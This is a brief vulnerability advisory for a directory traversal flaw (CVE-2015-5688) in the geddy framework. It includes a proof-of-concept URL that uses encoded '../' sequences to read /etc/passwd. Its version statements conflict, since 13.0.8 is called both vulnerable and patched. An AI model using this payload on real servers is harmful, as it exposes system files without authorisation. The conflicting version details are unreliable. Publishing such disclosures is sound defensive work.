Directory Traversal

Module: geddy

Published: July 27th, 2015

Reported by: Vikram Chaitanya

CVE-2015-5688

CWE-22

Vulnerable: <13.0.8
Patched: >=13.0.8

Overview

Versions 13.0.8 and earlier of geddy are vulnerable to a directory traversal attack via URI-encoded attack vectors: a request path whose `../` segments are percent-encoded (as `..%2f`) is not decoded and normalized before the file is resolved, so the check for traversal sequences is bypassed.

Proof of Concept

http://localhost:4000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

Remediation

Update geddy to version 13.0.8 or later.

References